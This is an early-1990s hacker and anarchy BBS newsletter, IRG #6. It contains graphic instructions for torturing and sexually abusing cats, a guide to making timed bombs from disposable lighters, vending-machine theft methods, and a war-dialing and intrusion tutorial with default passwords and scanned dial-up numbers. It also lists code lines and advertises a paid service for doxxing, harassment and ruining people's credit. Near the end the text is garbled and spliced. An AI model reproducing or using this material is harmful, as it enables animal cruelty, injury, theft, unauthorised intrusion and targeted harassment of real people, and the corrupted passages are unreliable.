                 //////     ///////     ////////
                  //       //    //    //
                 //       ///////     //   ////
                //       //    //    //     //
             //////     //     //   /////////
             
     
     
    International Rogues Guild and Shadow/Net Presents...            
    IRG Newsletter v6.00              Released: 2/20/91 
    Written by: Haywire               Edited by: Haywire
        
        Hi everyone,
                Heres IRG number 6 for ya, more people are getting interested
and I am happy about it.  Theres alot of good stuff this time(like always,
hehe) so read up.  



 5.01 Table Of Contents
 ----------------------
 5.01...................................Table Of Contents              
 5.02...................................Disclaimer
 5.03...................................More About IRG
 5.04...................................CyberPunk Follies
 5.04b..................................State Of The Union Reply by Psycho
 5.05...................................Letters From Prison
 5.06...................................Planned Parent Hood For Cats by Damaged
 5.07...................................Disposible Lighter Bombs by Psycho
 5.08...................................Vending Machine Revenge by Psycho
 5.09...................................The Art of Scanning by Control-S
 5.10...................................Hacking CompuServe by Control-S
 5.11...................................Dos Trips by Wasteland Warrior
 5.12...................................Running The ShadowNet
 5.13...................................VMB's From Hell
 5.14...................................Hellos and Goodbyes 
                             
5.02 Disclaimer
---------------
        All items in this newsletter are meant for informational purposes. 
It is written to encourage illegal activities, I hope the reader is inspired
to break the law after reading all IRG Information.  Of course the authors of 
this newsletter cannot be held for anything that the reader does.
        WARNING: Remember ALL explosives are dangerous, DO NOT, I repeat, DO
NOT mess around with any of the recipes for explosives, EVER!  These recipes
are real, they can kill you, and anyone else.  Make sure you know what you're
doing.  Otherwise its your fault.

5.03 More About IRG
-------------------
        We have one new ShadowNet member this issue and a new journalist.
Hopefully you people are getting the idea and starting to write things for ANY
group, just sharing the wealth of info out there.  Until next time...


            IRG Members              Rank
            -----------             ------
            Haywire                 IRG and ShadowNet Leader
            Wasteland Warrior       Part Time Programer,Game Winner,IRG Member
            Psycho                  (615)ShadowNet Member
            Dr. Digital             (619)ShadowNet Member
            Damaged                 IRG's "Sick" Member
                
            Journalist
            ----------               
            Haywire
            The Spectral Demon
            Control-S
            Kryptic Night
            Psycho
            Damaged
            Wasteland Warrior
                
        Thats about it, if you feel like becoming a member of either IRG or
ShadowNet.  Please call one of the IRG nodes.  If you would like to become and
IRG node again contact one of the IRG nodes.


5.04 CyberPunk Follys
---------------------
        I have only gotten one reply to my "State Of The Union" speech, it
seems that either people don't care what I say or they areto lazy to call up my
board and give me a response.  It seems that the Hacking community has
turned to shit more then I had thought.  But maybe people will get the idea one
day and move on to a higher level.


5.04b State Of The Union Reply by Psycho
----------------------------------------
In response to Haywire's "State of Hacking Today" editorial in IRG #05, I would
like to make the following comments:

I agree with Haywire 100%- This shit over "Hacker Wars" has gotten WAY out of 
hand... What in the hell is wrong with people?!? Isn't hacking supposed to be a
means by which we SHARE information and spread the wealth of knowledge? We 
hackers have before us an incredible realm of POWER- This has been exhibited 
time and time again; Everytime you hear of some kid who hacked into NASA or 
someplace and got caught, there are probably dozens more getting away with 
something just as spectacular.

In short, we have the ability to manipulate and control the flow of ALL manner 
of electronic information. The authorities are starting to realize the actual 
scale to which systems can be hacked into, but it is far too late to do 
anything about it. For every hacker that gets busted, five more take his place-
and it's a never-ending cycle.

United and working together as one, hackers have the propensity to virtualy 
control (or shut-down) many facets of our society on a GLOBAL scale: banking, 
sattellite communications, military, law enforcement, etc., etc.... But instead
of working together, the hacker community is splintered into many factions, all
more or less working against each other. Instead of liberating information for 
all, we are instead battling it out in our own little area codes, searching for
short-lived fame.

I'm not saying that we should shut down all systems and holds the world's data 
for ransom; That would be futile. Instead, we need to help educate those with 
an interest in hacking but lack experience. Not that we should toss info out to
anyone- There are still (and always will be) certain type of people that "just 
don't get it"... A little information and a lot of stupidity can be a dangerous
thing with this type of "wanna-be". By a careful process of weeding out these 
types, the data will begin to flow into the hands of those that can best put it
to use.

So, in 1991, let's try to unify and SHARE our expertise- And I think you'll 
find that the hacking/phreaking community will benefit from this like never 
before. Hats off to Haywire and everyone else involved with the IRG for 
publishing this fine newsletter and making an effort for change.

                                                             -Psycho

5.05 Letters From Prison
------------------------
        I have been getting alot of stuff, this issue and I am very happy about
it.  The more the better, it always seems like I never have enough stuff.  This
issue is pretty long getting into alot of good stuff.  This is a great issue
check it out...


5.06 Planned ParentHood For Phelines by Damaged
-----------------------------------------------


                          Phile #1 of a series Unknown


                          @-@-@-@-@-@-@-@-@-@-@-@-@-@-
                          -                          @
                          @  Planned ParentHood for  -
                          -                          @
                          @         Phelines         -
                          -                          @
                          @-@-@-@-@-@-@-@-@-@-@-@-@-@-

                                   WRiTTEN BY:

                                     Damaged
                                     2.14.91


  iNTRO 

   Ok dudes this is my phirst seriers of Anrkey philes on Kat's.  Don't you
  just hate those little pussy's, i sure in the hell do.  Anyways,  the phile
  is all How to do it yourself Home Kat abortions.  Why the reason for kats,
  well i hate the goddamn shitheads for specific reasons.  That i won't get
  into.  Well enjoy the phile and have phun.


  SHiT YA'LL NEED 

  Propane torch
  Koat Hanger
  Gloves    <should be able to resist heat>
  Rope                <optional>
  Nails               <optional>
  Hammer              <optional>
  Drugs
  & a Kat of kourse


  GET'N STARTED 

   Ok, now get the above required stuff.  Now toke a little, phry or whatever
  get's ya going.  Phirst off take the koat hanger and bend it into a phairly
  straight wire.  Take the koat hanger and make a noose on one end.  You need
  to make sure that the noose is small enuf to phit into da Kat's Kunt.

  PHUN PART 

   Ok now go out and phind yer victim.  Well you have phound a kat, put on
  the gloves so you don't get scratch to hell and back.  Now this is where
  the optional shit komes in.  You kan either Nail the phucker to the ground
  by hammer'n nails thourgh it's pheet.  This technique i phind to be the most
  effective.  Or if your one of those squemish types (why the phuck are you
  read'n this then??) you kan use the rope.  Just spread the phucker's legs
  to the phour korners.  Tie the rope around each paw and tie to something
  else.  Now you have the kat down supplied and bagged.  Reach over and grab
  your nice instrument(koat hanger) and also grab the torch.  Now you should
  be still wear'n the gloves, if not jack'n off will be a little harder phor
  you to do now.  Anywayz, heat up the end of the noose with the oval end or
  however the phuck you made it.  Wait until the shit is shine'n real bright
  orange or yellow.  Some koat hangers will even turn white, now make sure
  you don't melt the damn noose. duh  Insert the heated end of the noose into
  the kat's kunt, now jam the phucker all around, make sure you get every last
  one of those bastard kittens outta there.  After you have phinished, unnail
  or untie the kat.  Now i doubt it will walk away, but if you know who owns
  that kat, be a phriendly neighbor and drop it off at their house phor them.
  Now you really don't know which Kat is or not pregneat so hell try evey one
  of those pussy's.  Now this also works for dogs, and even try this on yer
  girlphriend if you even knock her up.


  OTHER SiCK SHiT 

   Now some other phun shit to do while do'n this.  Bring along a tape recorder
  or a kamcorder and record the shit.  Go home listen or watch it over and
  over again.  Loads of phun dude.  Now for you sick perverts,  take a knife
  and just make the kat's kunt big enuf to slide yer dick in, hell a phree
  phuck.  You kould also bang the phucker up the ass to if ya wanted.  The
  best part about this is that it's like bust'n a virgin everytime and you
  don't have to wear a kondom either!  Oh yea while ya do this phry really
  hard too.

  Yo'S & PHUCK oFF'S 

  Yo's to LoL-PHUCK, THG for thier latest kracks, Sam Brown for all his nice
  back doors to Emulex, METALLiCA, Lutzifer, and all who think that they deserve
  some yo's (yea right)

  Phuck off's to PE Give it up, THG got yer ass Kicked, Acid Alliance, QSD
  lamers, Alto's you need to UPGRADE big phuck'n time, leeches, and all those
  K-Rad K0de KiDZ who do noth'n but phuck'n leech as hell and get Kaught too.


  KALL THESE KiCK'N SiSTEMS 

    Insanity Lane..........619.591.4974     -=> IRG HQ <=-
    Zanaphopia.............404.642.8703     -=> AoA HQ <=-
    The Corrupt Society....619.630.8450     -=> NHA HQ <=-
    Demon's Crypt..........516.791.1427     -=> SoC HQ <=-
    Phreak Accident........404.977.4272


  Latur dudes
      Damaged


[--------------------------------- EOF ----------------------------------]


5.07 Disposable Lighter Bombs
-----------------------------

                                **************
                                *            *
                                * Disposable *
                                *   Lighter  *
                                *    Bombs   *
                                *            *
                                **************

                                   by PSYCHO

                        Written EXCLUSIVELY for The IRG



For those of you who are budding anarchists or Mad Bombers, but don't feel
comfortable cooking up nitroglycerine in your mom's kitchen or making pipe
bombs in the garage, here's a fairly decent alternative that is safe, easily
transported, cheap, and effective if used properly.

All you need is a good supply of those shitty disposable lighters, like a Bic
for instance. These can be bought cheaply (or stolen, if you're so inclined) at
every damn convenience store between here and East Camelfuck, Iraq. Prices 
range from about 39 cents for averaged-sized lighters, up to about $1.79 for 
the extra-large ones, such as the Cli-Cla (my personal favorite- it is a HUGE
disposable, holding about 65% more butane than the large Bic! They're available
at fine truck stops everywhere...). Here is a chart to help you decide which
lighter is best for your explosive needs:

        Lighter                   | Size of Explosion *
       ---------------------------|----------------------------------
        Mini Bic                  | Small; 4 to 6 inch fireball
                                  |
        Scripto                   | Medium; 6 to 12 inch fireball
                                  |
        Regular Bic               | Large; 12 to 18 inch fireball
                                  |
        Cli-Cla                   | HUGE; 24 to 30 inch fireball
       --------------------------------------------------------------
*(NOTE: These sizes are only an APPROXIMATION based on past observances-
        fireball size and intensity may be affected by such factors as 
atmospheric pressure, wind speed, humidity, manufacturing defects, etc. 
Your results will vary.)

As you can see by the above chart, some of these lighters can be quite 
powerful. To give you a better frame of reference, consider the Mini Bic to be 
as powerful as an average firecracker, the regular Bic as powerful as an M-80 
firecracker ( a REAL M-80... You can only get them illegally in this country- 
they are equal to 1/4 stick of dynamite), and the Cli-Cla as powerful as 1/3 to 
1/2 stick of dynamite, under perfect conditions.


                     PREPARATION AND METHODS OF DETONATION

To prepare a lighter for use as an explosive device, the only real modification 
that must be made is the removal of the flame guard. The flame guard is the 
semi-elliptical piece of metal that is found on top of the lighter which 
encases the gas jet and flame adjustment mechanism (if present). This is easily 
removed by using a screwdriver (or even a finger) to pry away one edge of the 
flame guard, and thus popping the whole thing loose.

With the above out of the way, you are ready for the placing of the device. 
Keep in mind that since the laws of physics declare that a force will always 
follow the path of least resistance, some forethought should go into the 
placement of the device for best results. If you just want a purely-for-the-
hell-of-it explosion, the lighter can be placed on open ground, but for a 
specific purpose, such as the destruction of an object, opening of a door, 
etc., the lighter will need to be wedged as tightly as possible against the 
target.

The only "timing device" you will have, such as it is, is the actual flow of 
gas from the lighter. Some lighters have no flame adjustment mechanism, and 
thus you have very little control over when the explosion will take place. On 
lighters where the control is present, you will be able to approximate the 
point at which detonation will occur. This is accomplished by turning the 
adjustment wheel toward the <+> or <->, with the <+> side naturally exploding 
faster. In some lighters, the maximum <+> setting can be over-ridden to allow 
the butane to escape very quickly, but keep in mind that the faster the gas 
escapes, the lower the power of the resulting explosion. You may find some 
experimentation necessary with different types of lighters you plan to use      
before you can become familiar with the approximate detonation times.

Once you have decided on a target and length of time needed to escape and/or 
take cover, you are now ready to ignite the lighter. The most important element 
to keep in mind it that the gas release lever MUST remain depressed for the 
duration of time until the explosion occurs. There are many methods for 
assuring this, as pointed out below:

    A. Wedge the lever in the open position by placing an object between it and  

   the striking wheel.

B. Glue the lever down with a glob of Crazy Glue.

C. Tape the lever down with aluminum strapping tape (regular tape will not   
   work due to rapid melting).

D. Wire the lever down with a few inches of light-gauge copper wire.

These methods are not the only absolute choices you have, but I have always had 
good luck with them.

Once the lever has been secured, you need to act as quickly as possible, to 
ensure as little butane as possible is wasted. Using another lighter, ignite 
the stream of gas escaping from the one you want to explode. Another factor you 
might want to consider for timing is the physical direction of the tank of the 
lighter in relation to the flame- If the flame is above the tank (as in normal 
operation), it will take much longer for the heat to melt the plastic and cause 
the detonation than it would if the tank was placed at a 45-or-so degree angle 
with the flame being BELOW the tank. Here is a chart of approximate times based 
on positioning of lighter and gas flow:


               Gas    |   Lighter Upright   |  Lighter Inclined
               Flow   |  (flame above tank) | (flame below tank)
              ==================================================
               MIN.   |     5-10 minutes    |     3-5 minutes
              --------|---------------------|-------------------
               MED.   |     3-5  minutes    |     1-3 minutes
              --------|---------------------|-------------------
               MAX.   |     1-3 minutes     | 60 seconds or LESS

Again, these figures are APPROXIMATE- Times will vary according to many factors 
including, material used in manufacture, quality of butane, etc.

Using the above chart as a guide, plus some experimentation on your own, you 
should be able to discern timing factors relating to your individual needs in 
certain situations. Of course, lighting the butane and allowing it to melt the 
plastic tank casing is not the only method for detonating disposable lighters-
other possibilities include:

    * Affixing a large firecracker or other small explosive device to the tank

* Placing the lighter in an open flame (campfire, fireplace, etc.)

* Placing the lighter on, in, or near a heat source (engine block, tail 
pipe, oven, space heater, etc)

As you can see, however and wherever you choose to use a lighter as an 
explosive, it is a cheap and (usually) ample solution. Always use great care 
and common sense when handling ANY explosive device, and have your escape route 
or cover picked out well in advance. Also be aware that, due to the materials 
used in it's construction, an exploding lighter will hurl bits of metal and 
molten/flaming plastic, sometimes for several yards in all directions.

                                HAPPY BOMBING!

Thanks to: Haywire & The MIGHTY IRG!

Special Thanks to: The Phantom Fireman for his pyromania expertise.


5.08 Vending Machine Revenge
----------------------------


                            VENDING MACHINE REVENGE


                                   by Psycho

                              Written for the IRG



How many of you have ever been ripped off by a vending machine? I would guess 
that EVERYBODY, at one time or another (and probably MANY times), has met up 
with a "change eater". This can be frustrating as hell, especially if you're 
hungry or thirsty and the machine took all the change you had. Worst of all, 
many times the owner of the machine takes his sweet time getting it fixed- 
After all, any money you lose is pure profit for him. The following is a 
collection of various techniques that have been used with great success to 
extract revenge on these money-grubbing bastards, and can put a few bucks in 
your pocket as well. I guess some unscrupulous person COULD use this 
information just to rip off other hapless consumers, but that is their 
discretion (ha ha!).

1.0 SLUGGING
    This is one of the most common forms of Vending Machine Revenge (from 
herein referred to as VMR), and also one of the safest. Basically this 
involves putting something into the machine that is not a coin, but the 
machine will think it is. Experimentation of a high degree will be in order 
here, as all machines have different levels of sensitivity. Some of the 
more common items used include: metal washers, arcade tokens, foreign 
coins, plastic discs, etc. I think you get the idea. I have even heard of 
people using a bench grinder to file pennies down to dime size, but that 
seems like an awful lot of work for 9 cents, but how you want to spend your 
time is up to you. Again, you'll have to experiment a lot with this one. If 
anyone finds some that work particularly well, leave me a message on the  
IRG/Insanity Lane node, and I'll draw up a chart for a future issue.


2.0 TIPPING
Another quite popular method, this is accomplished by physically tipping 
the machine forward as far as you can get it, hence the name. This works 
best on those machines that have potato chips and stuff dangling from long 
metal rods, and also those that use spiral rods to hold the stuff. If you 
want to use this method of VMR to the fullest, it's best to take along a 
couple of stout friends. Reason being, you will get the best results by 
practically putting the front of the machine down to the floor, and some of 
these bastards can be REAL heavy. So, DON'T try this one alone (unless you 
look like Arnold Schwarzeneggar), and make sure you do it quietly and in an 
out of the way area to avoid getting caught.

3.0 ROCKING
The Rocking method for VMR is similar to the above, but is seems to work 
best on coke machines which dispense cans. To get free cokes, you rock the 
machine back and forth, really banging the hell out of it. This confuses 
the machine's coin mechanisms, and it will usually start spitting out 
cokes. This VMR method will also require the assistance of friends, for 
obvious reasons (coke machines are the heaviest of all vending machines). 
This one must also be executed in a very deserted place, due to the 
excessive noise level created. You'll also want to remember to take along 
some backpacks, pillowcases, etc., to put your free cokes in. I have seen 
machines completely emptied using this method.

4.0 PLUGGING
So far, we've only discussed methods with which you can obtain free snacks- 
Now, here's one that can net you some good pocket change. Unfortunately, 
this will only work as described on newer coke machines. Perhaps with 
experimentation, it can be adapted for use on other machines. Plugging is 
accomplished by doing just that- you use something which will get hung in 
the coin slot, such as a penny, slug, etc., but will still fall through 
when the coin return is pressed. On newer coke machines, the coin return is 
a long piece of horizontal metal that presses straight down. After 
inserting your plug, use a flat-blade screwdriver to bend the coin return 
bar so that it cannot be depressed. Now, take the rest of the day off and 
do whatever. When you return later that night, use your screwdriver to bend 
the return lever in the other direction. When you press it down- JACKPOT! 
You get all the coins that other people have "lost" that day. Rotate among 
different machines, and don't plug the same one more than once a week to 
obtain best results. By doing this to enough machines in various locations, 
it's possible to make around $100 PER DAY (the average take for one machine 
is usually around $5). Another good place to do this occasionally is coke 
machines in expensive hotels, since they usually inflate the price of their 
drinks by 50% over normal machines. Be extremely careful and don't get TOO 
greedy, and this method is very safe.

5.0 JAMMING-1
This type of VMR is one of the best for getting lots of free stuff. What 
you do is actually jam the "product chute" (where the goods come out). Any 
manner of things can be used to do this. For instance, open the little door 
on a coke machine where the cans come out. Now, take a stick, huge wad of 
paper, etc., and cram it as far up into the machine as you can comfortably 
reach. This will block the arrival of anyone's purchase, and you only have 
to pull out whatever you blocked it with on your return to retrieve the 
stuff. On cigarette machines, you can even put tape over the side slot 
where the smokes are dispensed to accomplish this. As in some of the above 
methods, experimentation will be in order here to learn about the machines 
in your area. This is a fairly safe method of VMR.

6.0 JAMMING-2
This is the same as the above method, but instead you jam the change return 
slot. It's not as profitable as screwing up the coin return, but hey- it's 
FREE money. You may have to use a small wire to accomplish this on machines 
that have a small door that opens inward on the change slot. Again, if done 
smartly and not too often to the same machine, this VMR method is safe.

7.0 ZAPPING
Personally, I have never been able to get this one to work, but I know 
people that swear by it and say they use it all the time. Also known as 
"shorting", this type of VMR involves locating the socket where the machine 
is plugged in, and rapidly working the plug back and forth, causing the 
electronics in the machine to screw up. I'm told it only works on machines 
that have an LED display showing the amount you've dropped in. One person 
claims to have "maxed-out" the display at $9.99 and got that much OUT of 
the machine when he hit the coin return! Like I said, I've never been able 
to do this, but there are lots of people who claim it can be done. 
Experiment and find out for yourself, and drop me a line if you get it to 
work.

8.0 KILLING
This isn't as drastic as it sounds- It actually means that you unplug the 
machine, thus "killing" the power to it. Some machines, when unplugged, 
will simply NOT return any coins. And, you'd be surprised at how many 
people will go ahead and stick money in a machine, even if it's not lit 
up... And most people won't look for the plug to check it, either. This is 
a very safe, quiet method that has been proven to work on certain machine. 
As before, experiment with machines in your local area.

Well, that should be enough ideas to get you started- I'm sure there are many, 
many more. If you have a particular favorite, leave me e-mail on Insanity Lane 
and I'll include them in any future updates of this article. In the meantime, 
just remember not to get too greedy, and you can have a tidy little income from 
your VMR exploits.

Thanks go to: Haywire & the IRG for publishing the newsletter and allowing me
              to write this article.

Special thanks to: The Bubblegum Bandit, H.R. Puffenstuf, & Headhunter for    
                   their input in compiling this article.


5.09 The Art Of Scanning by Control-S
-------------------------------------


                     +++++++++++++++++++++++++++++++
                     ++                           ++
                     ++        The Art Of         ++
                     ++    *->> Scanning <<-*     ++
                     ++                           ++
                     ++       By: Control-S       ++
                     ++                           ++
                     +++++++++++++++++++++++++++++++


This file is written for International Rogues Guild (IRG), and is
the second in a series of files aimed towards the begining hacker.
If you've been around a while, you will most likely find nothing
of use here.


Part 1: Scanning, the art of
Part 2: Scan-Pages v1.00


Disclaimer: This phile is for informational purposes only, and I
cannot be held responsible for the actions of anyone reading it.

WARNING: If the words "k-kewl", "d00d", or "k-elyte" are a part of
your every day vocabulary, stop reading now, you are to far gone for help. 


Scanning:

Scanning is one of the most legal aspects of hacking, and a lot of fun too.
I'm not saying that scanning IS legal, I really doubt you could get anyone
to answer that question. If the SS wants to bust you, they will do it for
scanning, or anything else they feel like, if theres no law against it,
they will make one up! You can't win, so I would just recommend that you
watch your step no matter what you do.

You can scan many diferent places, like x25 networks such as TymNet and
Tele(Sprint)Net or simply telephone exchanges, which is what I'll be 
going into here: Scanning your local exchanges, I basically view this as
'getting to know your neighborhood' - its good to get an idea of how 
many modems are in yer area, and just what sort of 'puters are connected
to them. You'll more than likely come across a few Unixes, and some VMS',
if you're lucky, you'll find a LAN or WAN, and be able to reach a bunch
of different systems from one number, some of these even connect to far
systems, some with outdials (which you can scan other areas through), or
gateways (where you can hook into even more systems and/or psn's). 



Things You Need:

*Personal Computer -  (almost any type) (Amiga recommended)
*Modem - (any baud) (at least 2400 recommended)
*A Wardialer or Scanning program - These are available for just about
 every type of computer, but if you can't find one, they are easy to
 write yourself, in either basic or even scripting. (I would highly
 recommend you write your own, its a good way to get started programming
 and you can customize it to do exactly what you want it to.)
*References - You should have on hand (or commited to memory) some
 text files or manuals that will help you identify the systems you find,
 and then give you and idea of how to get in and possibly use them.
 (You can find detailed 'how to' files on just about any operating
 system you might find in many Phrack newsletters, if you don't have
 them all, get them!) - (See appendix A of this file for simple system
 identification).
*A little common sense - sorry, you're on your own with this one.


Getting Started:


Using that little bit of common sense, you should fire up your computer
and modem. (If you can't get by this part, you should stop reading this
file immediately, run down to your nearest computer store, and trade
your PC in for a nintendo!)

For best results, you will want to do some sort of sequential scan, this
way you won't miss any carriers. If you are paranoid about leaving a
sequential patern, (the SS looks for this sometimes, trying to catch
'c0dez kidz') then you will have to make some part of the dialing random.
Making the whole scan random has a few problems; if you wan't to make sure
you get all of the numbers, and don't keep going over the same ones, you
have to keep track of all the numbers dialed and check it every time
before dialing. This is a big waste of time, the best way to do a sequential
scan without a patern, is to use a node dialer. Node dialers are common
in code hacking programs, and these are easilly modified to just scan.
The ideal configuration for a node dialer (the one I use) would be to
use 10 nodes, each scanning 1000 numbers in the same exchange, then just
randomize which node is dialed.
Example:

Node 1 Dials 0000->0999
Node 2 Dials 1000->1999
Node 3 Dials 2000->2999
Node 4 Dials 3000->3999
Node 5 Dials 4000->4999
Node 6 Dials 5000->5999
Node 7 Dials 6000->6999
Node 8 Dials 7000->7999
Node 9 Dials 8000->8999
Node10 Dials 9000->9999

ATDT <prefix>+<random node>

This method is just as fast as dialing them straight out, you don't
miss any numbers, re-dial any numbers, and you aren't using any
detectable dialing pattern (other than possibly 300 calls per hour).


Now that you've got your dialer configured, you need to find a good time
to scan. Again, if you're paranoid, you should stick to scanning
between 9AM and 5PM. This is for two reasons; 1) This is the when most
buisness calls are made, and in the huge volume, you will be that much
harder to detect. 2) If you DO get busted (can you imagine going to court
for such a thing? hah!) you will have a good case, as many people dial
sequential numbers durring this time, (re: telemarketers, surveys...).
This is also probably the time when you'll be at work/school/whatever,
so you won't be needing your CPU. (I personally scan while I'm asleep,
at night - I'm not that paranoid!) As a rule of thumb, don't watch the
dialer. For some reason, no carriers are detected while you watch the
scan in process. (I've heard rumors that this is the result of a minor
disturbance in the local space-time-continuum caused by invisible 
emissions from the iris, but have seen no proof to back this theory.)

Okay, now you have your dialer ready and a good time to scan. Fire it
up and check on the progress every few hours. After you scan out a fair
sized list of carrier signals, you should give the dialer a rest, boot
your favorite term program, and investigate all your finds. Don't expect
to see something like this: "Welcome SysOp!" on the systems you check, 
in fact, expect nothing. Many systems don't wave any banners or tell
you anything, you have to try and coax a responce out of them. Things
to try would be: <Carriage Return>'s, Ctrl-C, or any other Ctrl-'s,
(if you send a Ctrl-S, be sure to send a Ctrl-Q after it, because many
systems use this as a 'halt-output' switch, and you may discover the
right keys to press, but never know it because all output is stopped.
Try sending "..." or @'s, [Esc], and sending a hard break almost always
gets some responce, if none of the above work, try any character on 
the keyboard, and words like "boot, start, run, load, logon, login".
If you have an external modem, keep an eye on the "Recieve Data" light,
if it flickers and you aren't getting anything echoed to your screen,
or possibly a lot of garbage characters, switch to 7E1, or call back
at a lower baud rate. (I've found a bunch of systems with modems that
will connect you at 2400, but the com ports will only transfer data
at 1200 or 300) If you try everything and can't get any responce at all,
it could be a company which turns its computers off at night, but
leaves the modem on (so call back in the day), a crashed system, or
a hacker who got your scan-call at 3am and wistled an unerring 8N1
into his reciever at a steady speed of 2400 bits per second. -heh

When(if) you identify the operating system, break out your references,
and try all the default accounts. If you get in on a default, but
you're unfamiliar with the particular OS, don't mess around, just log
off and do a little research, learn how to turn off all the logging and
cover your tracks, then go back and have phun to your hearts content.

Remember: keep notes on all the systems you find. You never know when
some ancient OS might come in handy, or what you might find that
relates to any system while trashing at a later date!



Apendix A:

The following is a short chart to help you identify operating systems.

System     Prompt                Default Accounts/Passwords
---------  --------------------  -------------------------------------
Unix       login: -or- Login:    root,daemon,bin,sync,uucp/(unpassworded)

VAX        Username:             SYSTEM/MANAGER -or- FIELD/SERVICE

DEC-10     User ID:              1,2/ ?

HP-?000    PLEASE LOG IN:        HELLO,MANAGER,

Iris       ACCOUNT ID?           MANAGER

VM/CMS     IBM VM/370 ONLINE     logon (user id)

NOS        FAMILY:

Primos     "PRIMENET XX.X.XXX"   login SYSTEM/SYSTEM -or- OPERATOR



* This hardly all-inclusive, only the ones I know from memory, you should
  try and compile your own list, and add new systems to it regularly.



   This has been a phree Speech publication, (C) pSp and IRG 1991


As usual, I can be contacted for whatever on any of the IRG nodes, or
IRG e-mailing addresses. Please mark all comments "Attn: Ctrl-S".


              Control-S, Freelance G-File Artist (for hire)






Scan-Pages v.99b:

Note: Unfortunately, I will be unable to finish my current scan in time
for the next IRG release, so I stuck this partial scan in to fill the 
spot. Look for a complete scan in v1.00, next IRG.


NPA/NUM-BER    Baud   System/Comments
------------   -----  --------------------------------
619/259-0038   n/a    ?/constant tone
619/270-0017   1200   ?/has echo on
619/270-0038   2400   ?/"Unauthorized User, Call Recorded and Disconnected"
619/753-0006   n/a    ?/constant tone (may be loop)
619/753-0013   n/a    ?/constant tone
619/753-0171   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0172   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0173   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0174   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0175   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0176   1200   ?/"D29 System C, Node XX, Line XX"
619/753-0243   2400   ?/(sending a hard break makes hangup)  
619/753-0287   1200   TRW Dialup
619/753-0288   1200   TRW Dialup
619/753-0548   1200   ?/"D29 System C, Node XX, Line XX" 
619/753-0716   1200   ?/"ALPHA BASE, PLEASE LOG IN:"
619/753-0738   1200   ?/(just hangs up, maybe callback security?)
619/753-0911   1200   ?/(response to break ^Z)
619/753-0916   1200   ?/(response to break ^Z)
619/753-0933   1200   ?/(response to break ^Z)
619/753-0962   1200   ?/(response to break ^Z)
619/753-0981   2400   HP-?0000/PLEASE LOG IN: (try 'help')
619/753-1550   2400   PC-Plus Host Mode/ American Bamboo Society
619/753-2614   1200   ?/(absolutely no activity - a modem with no 'puter?)
619/753-2728   2400   "Host Name:" (^C will get "User ID:") (CIS, node ENC)
619/753-1654   2400   ?/Esc will get "ACCOUNT-ID: / PASSWORD:"
619/753-1079   1200   ?/"D29, System C, Node XX, Line XX"




        This is hardly a complete list, its more or less the result
of boredom, and fairly random scanning through an outdial, it does
cover about 1/3 of the 619-753 exchanange, but I never finished because
of lack of time and other projects taking precedence. I would like
to try and organize a concerted effort to map out any/all NPA's, and
eventually publish a masterlist of all detectable carrier signals. Its
easy to do, and you can usually let yer computer scan while yer gone
to school/work, so if you'd be interested in helping out, leave me a
note on one of the IRG boards and tell me the NPA and excknes you'd
be `BLe to scan, via local call or some sort of outdial, so we can make
sure that different people aren't wasting time scanning the same exchanges!
Anyone who helps to build the list will g1 at Glasgow
End of file - Frm    9; Next>



6.BBSs From Hell
----------------
        Here is this issue's installment of BBSs From Hell.

Board Name                      Phone Number      NUP       SysOp
-------------------------------------------------------------------------------
Shadow's Of Doom                313/274-5630      ?          ?
Fornax                          408/370-0722      ?          Briareos
The Rocky Mountains             714/530-6258      ?          ?
The CorrupT SocieTy             619/630-8450      Defiance   The Spectral Demon
Land Of Karrus                  215/948-2132      Nightmare  Scooter

Next issue we will have five more Elite BBSes for you to try.  Sorry if I have
placed your bbs number on here without your knowing, if you would like it
removed from the master list please E-mail me at Insanity Lane 619-591-4974
NUP: Last Try.


7.VMBs From Hell
----------------
        Heres a little plus I decided to have in each IRG news, a VMB list it
will work like the BBS list in that I will have 5 VMBs each issue and every so
often I will have a master list printed.  All changes to VMBs will be posted in
each IRG News.

VMB Number           Box Number               VMB Use
-------------------------------------------------------------------------------
1-800-877-7594                                Code Line
1-800-848-1488       * 0                      Code Line / Info Line
1-800-741-5881       9 + * * 1111             Code Line / Info Line
1-800-950-0203       289                      Time Lord's Code Line/ Info Line
1-800-950-0203       617                      Code Line / Info Line

Well thats it for this installment of VMBs From Hell.  If you would like you
VMB in IRG News please leave mail at IRG/ShadowNet VMB #1 1-800-527-0543 Box
Number: 8 + 158.


8.Running The ShadowNet
-----------------------
        ShadowNet is the newest addition to IRG.  It is a information service
for anyone willing to pay.  ShadowNet works the way a Private Investigator
works...you pay us to find out information on people, except we will do much
more than that.

        We will go one step farther than any PI would go.  We will change his
phone #, send him 100 pizzas, or ruin his credit rate.  Of course the more you
pay the better you get.  At the beginning we will work for free to show that we
can do what you ask.  So get your orders in fast.  All we need is a name, phone
number, handle, whatever.  The more information you start giving us the
more you will get back.  I also am in need of "agents" or people to help work
with me.  I hope to get at least one person in each area code so information
can be found easier and faster.  Of course you are not restricted to the
computer oriented community. We can and WILL find information on ANYONE. We'll
also work for anyone who is willing to pay. So let's hear from you, either on
my BBS/VMB.  Give me your voice phone number, and your name.  I will contact you
for who you want ShadowNet to find out about. If you would like to join leave
the same info but tell me that you want to join.  Simple enough. Until Next
time.


9.Hellos and Goodbyes
---------------------
        So you are now done reading IRG-03, I hope you enjoyed yourself.  I am
sure the more IRG Newsletters me and The Spectral Demon put out the better they
will get, if possible. TSD and I have worked hard on this newsletter and now its
your turn. Hurry & get those letters in for the next IRG News.  Now for the
hellos & goodbyes, greets and etc!

        FiRM what ever happened to you?
        INC ditto!
        Kryptic Night do you do Magic Mushrooms?
        PHA whats next for you?
      * Greets to Elite Tabloid Underground
        What ever happened to the Elite community?  Strike Back!
        Remember:  Big Brother Is Watching
        Freedom Of Speech!

* - Entries marked with *'s are by The Spectral Demon only
-------------------------------------------------------------------------------
This Is An Offical IRG/ShadowNet Production All Rights Resevered
Copy Write (C)   Jan. 1 1991
-------------------------------------------------------------------------------

        Call The IRG HeadQuarters:
        Insanity Lane
        Home Of IRG
        619-591-4974
        NuP: Last Try
        Running Aftershock 1.21
        Call here for the latest in IRG Productions, and invaluable P/H/C/A
        information found nowhere else, except at:

        The CorrupT SocieTy
        IRG Node 02
        619-630-8450
        NuP: Defiance
        Running AfterShock 1.21

        Also Call This Fine IRG/ShadowNet VMB #1
        1-800-527-0543
        Box Number: 8 + 158
First of course you MUST
